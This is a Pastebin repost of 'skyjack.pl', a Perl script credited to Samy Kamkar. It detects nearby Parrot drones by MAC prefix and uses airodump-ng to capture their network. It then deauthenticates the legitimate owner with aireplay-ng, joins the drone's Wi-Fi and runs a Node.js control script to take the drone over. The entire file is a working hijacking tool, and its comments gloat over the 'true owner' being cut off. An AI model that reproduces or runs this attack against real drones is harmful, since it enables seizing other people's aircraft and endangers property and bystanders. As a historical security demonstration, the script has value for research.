Advertisement
FlyFar

skyjack.pl

Mar 14th, 2023
1,278
1
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 3.73 KB | Cybersecurity | 1 0
  1. #!/usr/bin/perl
  2.  
  3. # skyjack, by samy kamkar
  4.  
  5. # this software detects flying drones, deauthenticates the
  6. # owner of the targetted drone, then takes control of the drone
  7.  
  8. # by samy kamkar, code@samy.pl
  9. # http://samy.pl
  10. # dec 2, 2013
  11.  
  12.  
  13. # mac addresses of ANY type of drone we want to attack
  14. # Parrot owns the 90:03:B7 block of MACs and a few others
  15. # see here: http://standards.ieee.org/develop/regauth/oui/oui.txt
  16. my @drone_macs = qw/90:03:B7 00:12:1C 90:3A:E6 A0:14:3D 00:12:1C 00:26:7E/;
  17.  
  18.  
  19. use strict;
  20.  
  21. my $interface  = shift || "wlan1";
  22. my $interface2 = shift || "wlan0";
  23.  
  24. # the JS to control our drone
  25. my $controljs  = shift || "drone_control/drone_pwn.js";
  26.  
  27. # paths to applications
  28. my $dhclient    = "dhclient";
  29. my $iwconfig    = "iwconfig";
  30. my $ifconfig    = "ifconfig";
  31. my $airmon  = "airmon-ng";
  32. my $aireplay    = "aireplay-ng";
  33. my $aircrack    = "aircrack-ng";
  34. my $airodump    = "airodump-ng";
  35. my $nodejs  = "nodejs";
  36.  
  37.  
  38. # put device into monitor mode
  39. sudo($ifconfig, $interface, "down");
  40. #sudo($airmon, "start", $interface);
  41.  
  42. # tmpfile for ap output
  43. my $tmpfile = "/tmp/dronestrike";
  44. my %skyjacked;
  45.  
  46. while (1)
  47. {
  48.  
  49.         # show user APs
  50.         eval {
  51.             local $SIG{INT} = sub { die };
  52.             my $pid = open(DUMP, "|sudo $airodump --output-format csv -w $tmpfile $interface >>/dev/null 2>>/dev/null") || die "Can't run airodump ($airodump): $!";
  53.             print "pid $pid\n";
  54.  
  55.             # wait 5 seconds then kill
  56.             sleep 2;
  57.             print DUMP "\cC";
  58.             sleep 1;
  59.             sudo("kill", $pid);
  60.             sleep 1;
  61.             sudo("kill", "-HUP", $pid);
  62.             sleep 1;
  63.             sudo("kill", "-9", $pid);
  64.             sleep 1;
  65.             sudo("killall", "-9", $aireplay, $airodump);
  66.             #kill(9, $pid);
  67.             close(DUMP);
  68.         };
  69.  
  70.         sleep 4;
  71.         # read in APs
  72.         my %clients;
  73.         my %chans;
  74.         foreach my $tmpfile1 (glob("$tmpfile*.csv"))
  75.         {
  76.                 open(APS, "<$tmpfile1") || print "Can't read tmp file $tmpfile1: $!";
  77.                 while (<APS>)
  78.                 {
  79.                     # strip weird chars
  80.                     s/[\0\r]//g;
  81.  
  82.                     foreach my $dev (@drone_macs)
  83.                     {
  84.                         # determine the channel
  85.                         if (/^($dev:[\w:]+),\s+\S+\s+\S+\s+\S+\s+\S+\s+(\d+),.*(ardrone\S+),/)
  86.                         {
  87.                             print "CHANNEL $1 $2 $3\n";
  88.                             $chans{$1} = [$2, $3];
  89.                         }
  90.  
  91.                         # grab our drone MAC and owner MAC
  92.                         if (/^([\w:]+).*\s($dev:[\w:]+),/)
  93.                         {
  94.                             print "CLIENT $1 $2\n";
  95.                             $clients{$1} = $2;
  96.                         }
  97.                     }
  98.                 }
  99.                 close(APS);
  100.                 sudo("rm", $tmpfile1);
  101.                 #unlink($tmpfile1);
  102.         }
  103.         print "\n\n";
  104.  
  105.         foreach my $cli (keys %clients)
  106.         {
  107.             print "Found client ($cli) connected to $chans{$clients{$cli}}[1] ($clients{$cli}, channel $chans{$clients{$cli}}[0])\n";
  108.  
  109.  
  110.             # hop onto the channel of the ap
  111.             print "Jumping onto drone's channel $chans{$clients{$cli}}[0]\n\n";
  112.             #sudo($airmon, "start", $interface, $chans{$clients{$cli}}[0]);
  113.             sudo($iwconfig, $interface, "channel", $chans{$clients{$cli}}[0]);
  114.  
  115.             sleep(1);
  116.  
  117.             # now, disconnect the TRUE owner of the drone.
  118.             # sucker.
  119.             print "Disconnecting the true owner of the drone ;)\n\n";
  120.             sudo($aireplay, "-0", "3", "-a", $clients{$cli}, "-c", $cli, $interface);
  121.  
  122.         }  
  123.  
  124.         sleep(2);
  125.  
  126.         # go into managed mode
  127.         #sudo($airmon, "stop", $interface);
  128.  
  129.         # connect to each drone and run our zombie client!
  130.         foreach my $drone (keys %chans)
  131.         {
  132.             # ignore drones we've skyjacked before -- thanks to @daviottenheimer for bug discovery!
  133.             next if $skyjacked{$chans{$drone}[1]}++;
  134.  
  135.             print "\n\nConnecting to drone $chans{$drone}[1] ($drone)\n";
  136.             sudo($iwconfig, $interface2, "essid", $chans{$drone}[1]);
  137.  
  138.             print "Acquiring IP from drone for hostile takeover\n";
  139.             sudo($dhclient, "-v", $interface2);
  140.  
  141.             print "\n\nTAKING OVER DRONE\n";
  142.             sudo($nodejs, $controljs);
  143.                
  144.         }
  145.  
  146.     sleep 5;
  147. }
  148.  
  149.    
  150. sub sudo
  151. {
  152.     print "Running: @_\n";
  153.     system("sudo", @_);
  154. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement